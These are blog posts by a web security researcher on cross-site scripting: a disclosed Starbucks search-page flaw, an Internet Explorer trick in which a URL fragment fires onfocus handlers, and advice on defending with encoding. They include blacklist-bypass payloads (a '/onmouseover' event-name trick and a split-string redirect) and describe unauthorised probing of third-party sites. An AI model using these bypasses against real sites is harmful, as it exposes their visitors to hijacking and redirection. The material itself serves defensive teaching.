This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all we’re debating about is how much I can do now that I’ve broken in.

And yet, I must go on.

I have to go on at this point, because I’m an external researcher to this company. I have to deliver to them a definite breach, or they’ll probably dismiss me as a waste of time.

The obvious thing to inject here is “"><script>prompt(1)</script>” – but we saw earlier that produced an “oops” page. We’ve seen that “prompt(1)” isn’t rejected, and the angle-brackets (chevrons, less-than / greater-than signs, etc, whatever you want to call them) aren’t rejected, so it must be the word “script”.

That, right there, is enough to tell me that instead of encoding the output (which would turn those angle-brackets into “&lt;” and “&gt;” in the source code, while still looking like angle-brackets in the display), this site is using a blacklist of “bad words to search for”.

Why is a blacklist wrong?

That’s a really good question – and the basic answer is that you just can’t make most blacklists complete. A blacklist only stands a chance if you have a very limited character set, and a good reason to believe that your blacklist can cover it.

A blacklist that might work is to say that you surround every HTML tag’s attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.

I say it “might work”, because in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.

Easier by far, to use a whitelist – only these few characters are safe, and ALL the rest get encoded.

You might have an incomplete whitelist, but that’s easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.

Back to the story

OK, so having determined that I can’t use the script tag, maybe I can add an event handler to the tag I’m in the middle of displaying, whether it’s a link or an input. Perhaps I can get that event handler to work.

Ever faithful is the “onmouseover” event handler. So I try that.

You don’t need to see the “oops” page again. But I did.

The weirdest thing, though, is that the “onmooseover” event worked just fine.

Except I didn’t have a moose handy to demonstrate it executing.

[image: the “onmooseover” handler, reflected into the tag untouched]

So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasn’t.

Similarly, “onfocus” triggered the “oops” page, but “onficus” didn’t. Again, sadly I didn’t have a ficus with me.

You’re just inventing event names.

Sure, but then so is the community of browser manufacturers. There’s a range of “ontouch” events that weren’t on the blacklist, but are supported by a browser or two – and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce “onwaveat”. Again, the blacklist isn’t future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.

Again, back to the story…

Then I tried adding characters to the beginning of the event name. Curious – that works.

[image: “?onmouseover” reflected into the tag – present, but not executable]

And, yes, the source view showed me the event was being injected. Of course, the browser wasn’t executing it, because of course, “?onmouseover” can’t be executed. The HTML spec just doesn’t allow for it.

Eventually, I made my way through the ASCII table to the forward-slash character.

[image: “/onmouseover” reflected into the tag – and the prompt fires]

Magic!

Yes, that’s it, that executes. There’s the prompt.

Weirdly, if I used “alert” instead of “prompt”, I get the “oops” page. Clearly, “alert” is on the blacklist, “prompt” is not.

I still want to make this a ‘hotter’ report before I send it off to Starbucks, though.

How “hotter”?

Well, it’d be nice if it didn’t require the user to find and wave their mouse over the page element that you’ve found the flaw in.

Fortunately, I’d also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And there’s an “onfocus” event I can trigger with “/onfocus”.

[image: the fragment in the URL sets focus automatically – the prompt fires on page load]

So, there we are – automated execution of my chosen code.

Anything else to make it more sexy?

Sure – how about something an attacker might try – a redirect to a site of their choosing. [But since I’m not an attacker, we’ll do it to somewhere acceptable]

I tried to inject “onfocus='document.location="//google.com"'” – but apparently, “document” and “location” are also on the banned list.

“ownerDocu”, “ment”, “loca” and “tion” aren’t on the blacklist, so I can do “this["ownerDocu"+"ment"]["loca"+"tion"]=” …

Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.

Now it’s ready to report.

Hard part over, right?

Well, no, not really. This took me a couple of months to get reported. I tried “security@starbucks.com”, which is the default address for reporting security issues.

An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.

I try the webmaster@ address, and that gets me nowhere.

The “Contact Us” link takes me to a customer service representative, and an entertaining exchange that results in them telling me that they’ve passed my email around everyone who’s interested, and the general consensus is that I should go ahead and publish my findings.

So you publish, right?

No, I’m not interested in self-publicising at the cost of someone else’s security. I do this so that things get more secure, not less.

So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.

This is where things get far easier – and where Starbucks does the right things.

The Information Security team works with me, politely, quickly, calmly, and addresses the problem quickly and completely. The blacklist is still there, and still takes you to the “oops” page – but it’s no longer the only protection in place.

My “onmooseover” and “onficus” events no longer work, because the correct characters are quoted and encoded.

The world is made safer and more secure, and half a year later, I post this article, so that others can learn from this experience, too.

By withholding publishing until well after the site is fixed, I ensure that I’m not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.

The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.

And did I ever tell you about the time I got onto Google’s hall of fame?

Playing with security blogs

I’ve found a new weekend hobby – it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.

I open my favourite search engine (I’m partial to Bing, partly because I get points, but mostly because I’ve met the guys who built it), search for “security blog”, and then pick one at random.

Once I’m at the security blog site – often one I’ve never heard of, despite it being high up in the search results – I find the search box and throw a simple reflected XSS attack at it.

If that doesn’t work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.

[Note: I use reflected XSS, because I know I can only hurt myself. I don’t play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I’m being paid.]

Finally, I try to find who I should contact about the exploitability of the site.

It’s interesting just how many of these sites are exploitable – some of them falling to the simplest of XSS attacks – and even more interesting to see how many sites don’t have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).

So, what do you find?

I clearly wouldn’t dream of disclosing any of the vulnerabilities I’ve found until well after they’re fixed. Of course, after they’re fixed, I’m happy to see a mention that I’ve helped move the world forward a notch on some security scale. [Not sure why I’m not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.

From clicking the link to exploit is either under ten minutes or not at all – and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.

Try using a WAF – NOT!

You can try using a WAF to solve your XSS problem, but then you’ve got two problems – a vulnerable web site, and that you have to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesn’t ever fix the problem.

Don’t echo my search query

If you can, don’t echo back to me what I sent you, because that’s how these attacks usually start. Don’t even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.

Remove my strange characters

Unless you’re running a source code site, you probably don’t need me to search for angle brackets, or a number of other characters. So take them out of my search – or plain reject my search if I include them in my search.

Encode everything

OK, so you don’t have to encode the basics – what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.

Which encoding?

Yeah, that’s always the hard part. Encode it using the right encoding. That’s the short version. The long version is that you figure out what’s going to decode it, and make sure you encode for every layer that will decode. If you’re putting my text into a web page as a part of the page’s content, HTML encode it. If it’s in an attribute string, quote the characters using HTML attribute encoding – and make sure you quote the entire attribute value! If it’s an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.

[Then, of course, check that your encoding hasn’t killed the basic function of the search box!]
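
As a minimal sketch of that layering – userSearch is a stand-in for the untrusted input, and you encode for the innermost decoder first:

var query = encodeURIComponent(userSearch);  // layer 1: the URL parser decodes this
var url = "/search?q=" + query;
var attr = url.replace(/&/g, "&amp;").replace(/"/g, "&quot;"); // layer 2: the HTML attribute
var link = '<a href="' + attr + '">Search again</a>';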

Respond to security reports

You should definitely respond to security reports – I understand that not everyone can have a 24/7 response team watching their blog (I certainly don’t) – you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don’t get a response much sooner, and see that as cause to publish their findings.

Me, I send a message first to ask if I’ve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.

Be like Billy – Mind your XSS Manners!

I’ve said before that I wish programmers would respond to reports of XSS as if I’d told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.

Using URL anchors to enliven XSS exploits

I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]

Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.

A quick reminder

XSS issues are significant and severe because:

  • An attacker with a successful XSS is rewriting your web site on its way to the user
  • XSS attacks can be used to deliver the latest Java / ActiveX / Flash / Acrobat exploits
  • Stored XSS can affect all of your customers, and can turn your web server into a worm to infect all of your users all of the time
  • A reflected XSS can be used to redirect your users to a competitor’s or attacker’s web site
  • A reflected or stored XSS attack can be used to void any CSRF protection you have in place
  • XSS vulnerability is usually a sign that you haven’t done the “fit and finish” checks in your security reviews
  • XSS vulnerability is an embarrassing rookie mistake, made often by seasoned developers

Make it “SEXY”

So, I enjoy reporting XSS issues to web sites and seeing how they fix them.

It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.

So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.

A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.

One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.

I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.

Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?

Could I make the attack more “sexy”?

Try something stupid

Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.

I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.

Anchor? What’s that in a URL?

You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:

protocol://address:port/path1/path2?query#anchor

The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc]

The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.

[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]

This anchor identifier in the URL is also known as a “fragment identifier” – technically, the “anchor” is the entire URL, though that’s not how the term is commonly used.

XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.

Sneaky.

The stupid thing

So, the stupid thing that I thought about was “does this work for any name? And is it the same as focus?”

Sure enough, in the W3C documentation for HTML, here it is:

Destination anchors in HTML documents may be specified either by the A element (naming it with the name attribute), or by any other element (naming with the id attribute).

[From http://www.w3.org/TR/html4/struct/links.html#h-12.1]

So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:

This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]

[From http://www.w3.org/TR/html4/struct/links.html#adef-name-A]

This is encouraging, because all those text boxes already have ids or names – they need them for their values to be submitted with the form.

So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.

That’s the first stupid thing checked off and working.

Bringing it into focus

But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.

Or is it?

Testing in Firefox, Chrome and Safari suggested not.

Testing in Internet Explorer, on the other hand, demonstrated that every version from IE8 – as old as that is – through IE9 and IE10 triggers focus behaviour, including any “onfocus” handler.

The TLDR version:

Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.

If you are attacking users of a vulnerable site that allows an attacker to inject code into an “onfocus” handler (new or existing), you can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.

You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q

OK, so you clicked it and it didn’t drop down the menu that normally appears when you click in the search field on Microsoft’s front page. That’s because the onfocus handler hadn’t yet been loaded when the browser set the focus. Try reloading it.

You can obviously build any number of test pages to look at this behaviour:

<form>
    <input type="text" name="exploit" id="exploitid" onfocus="alert(1)" />
</form>

Loading that in Internet Explorer with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.

So, that’s a security flaw in IE, right?

No, I don’t think it is – I don’t know that it’s necessarily even a flaw.

The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]

It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.

And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.

Is it right to publish this?

Finally, the moral question has to be asked and answered.

I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour, because those people can now use this against sites that are unaware of it. Even if a web site spots the XSS injection in its logs, those same logs will say that the injection requires a user action – setting focus to a field – with nothing apparently causing that to happen, so it looks like a relatively minor issue.

Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.

So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.

I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.

In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.

The best I can do is communicate, and this is the best I know how.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the pair of angle brackets that turn plain text into an HTML tag; the exploit itself is the injected script containing an alert(1) command.

Let’s say now that the first thing a programmer tries, to protect his page, is to replace the direct embedding of text with an <input> tag whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a new way of triggering the exploit in XSS-vulnerable code. Although it’s a simple example, this is the sort of thing that’s worth getting excited about.

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. That may be a new result, but it’s not a new trigger, and it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong, but they are more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed, you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.